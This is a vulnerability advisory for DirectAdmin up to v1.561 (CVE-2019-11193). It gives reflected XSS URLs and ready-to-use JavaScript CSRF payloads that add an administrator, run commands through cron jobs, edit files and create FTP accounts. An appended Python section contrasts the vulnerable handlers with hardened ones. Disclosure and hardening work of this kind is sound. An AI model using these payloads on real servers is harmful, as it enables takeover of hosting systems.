DirectAdmin 1.561 Cross Site Scripting

2019.04.14
Credit: Numan OZDEMIR
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Title: DirectAdmin Multiple Vulnerabilities to Takeover the Server <= v1.561
# Date: 12.04.2019
# Author: Numan OZDEMIR
# Vendor Homepage: https://www.directadmin.com/
# Version: Up to v1.561.
# CVE: CVE-2019-11193
# info@infinitumit.com.tr && root@numanozdemir.com
# Detailed: https://numanozdemir.com/respdisc/directadmin.pdf

# Description:
# Multiple security vulnerabilities have been discovered in the popular server control panel DirectAdmin by
# InfinitumIT. Attackers can chain these vulnerabilities to perform critical actions such as taking over control of the server.
# The vulnerabilities (Cross Site Scripting and Cross Site Request Forgery) make the following possible:
# adding an administrator, remote command execution (RCE), taking a full backup of the server and uploading it to the
# attacker's own server, web shell upload and more.

# Reflected XSS Vulnerabilities:
# https://SERVERIP:2222/CMD_FILE_MANAGER/XSS-PAYLOAD
# https://SERVERIP:2222/CMD_SHOW_USER?user=XSS-PAYLOAD
# https://SERVERIP:2222/CMD_SHOW_RESELLER?user=XSS-PAYLOAD

# Example Payloads:

# Add Administrator:
// Cross-site POST; the browser attaches the logged-in administrator's panel session cookie.
var url = "http://SERVERIP:2222/CMD_ACCOUNT_ADMIN";
var params = "fakeusernameremembered=&fakepasswordremembered=&action=create&username=username&email=test%40test.com&passwd=password&passwd2=password&notify=ye";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = true;
vuln.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
vuln.send(params);

# Remote Command Execution by Cron Jobs:
var url = "http://SERVERIP:2222/CMD_CRON_JOBS";
var params = "action=create&minute=*&hour=*&dayofmonth=*&month=*&dayofweek=*&command=command";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = true;
vuln.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
vuln.send(params);

# Edit File:
var url = "http://SERVERIP:2222/CMD_ADMIN_FILE_EDITOR";
var params = "file=the-file-full-path&action=save&text=new-content";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = true;
vuln.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
vuln.send(params);

# Create FTP Account:
var url = "http://SERVERIP:2222/CMD_FTP";
var params = "fakeusernameremembered=&fakepasswordremembered=&action=create&domain=infinitumit.com.tr&user=username&passwd=password&random=Save+Password&passwd2=password&type=domain&custom_val=%2Fhome%2Fusername&create=Create";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = true;
vuln.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
vuln.send(params);

# The vulnerabilities were fixed within minutes, thanks to DirectAdmin.
# InfinitumIT / For safer days...
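The two root causes the advisory relies on, a page that reflects the `user` parameter unescaped and state-changing POST handlers that accept any cookie-authenticated request regardless of origin, modelled beside their hardened forms. This is an added illustration, not DirectAdmin code or the advisory author's; the panel origin, session cookie, CSRF token and the request objects are constructed assumptions.

```python
import html
from dataclasses import dataclass, field
from urllib.parse import parse_qs

PANEL_ORIGIN = "https://panel.example:2222"    # assumed origin of the panel itself
SESSION_COOKIE = "session=CONSTRUCTED-SESSION"  # constructed value, not a real cookie
CSRF_TOKEN = "CONSTRUCTED-TOKEN"                # per-session secret the hardened handler expects

@dataclass
class Request:
    """Minimal request model; DirectAdmin's real request handling is not modelled."""
    method: str
    path: str
    headers: dict
    body: str = ""
    query: dict = field(default_factory=dict)

def reflect_user_vulnerable(req: Request) -> str:
    """CMD_SHOW_USER as the advisory describes it: the parameter is echoed unescaped."""
    return f"<h1>User: {req.query.get('user', '')}</h1>"

def reflect_user_hardened(req: Request) -> str:
    """Same page with HTML entity encoding for the HTML-body context."""
    return f"<h1>User: {html.escape(req.query.get('user', ''), quote=True)}</h1>"

def state_change_vulnerable(req: Request) -> bool:
    """Cookie-only authentication: a cross-site POST sent withCredentials is accepted."""
    return req.method == "POST" and req.headers.get("Cookie") == SESSION_COOKIE

def state_change_hardened(req: Request) -> bool:
    """Cookie auth plus an Origin/Referer check and a per-session token in the form body."""
    if req.method != "POST" or req.headers.get("Cookie") != SESSION_COOKIE:
        return False
    origin = req.headers.get("Origin") or req.headers.get("Referer", "")
    if origin != PANEL_ORIGIN and not origin.startswith(PANEL_ORIGIN + "/"):
        return False  # missing or foreign origin: reject
    token = parse_qs(req.body).get("csrf_token", [""])[0]
    return token == CSRF_TOKEN  # fails closed when the token is absent

# Constructed requests: the advisory's CMD_ACCOUNT_ADMIN form, once sent from a foreign
# page (the browser still attaches the panel cookie) and once from the panel's own form.
ADMIN_FORM = "action=create&username=username&email=test%40test.com&passwd=password&passwd2=password"
CROSS_SITE_POST = Request("POST", "/CMD_ACCOUNT_ADMIN",
                          {"Cookie": SESSION_COOKIE, "Origin": "https://attacker.example"}, ADMIN_FORM)
SAME_ORIGIN_POST = Request("POST", "/CMD_ACCOUNT_ADMIN",
                           {"Cookie": SESSION_COOKIE, "Origin": PANEL_ORIGIN},
                           ADMIN_FORM + "&csrf_token=" + CSRF_TOKEN)
```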


Copyright 2019, cxsecurity.com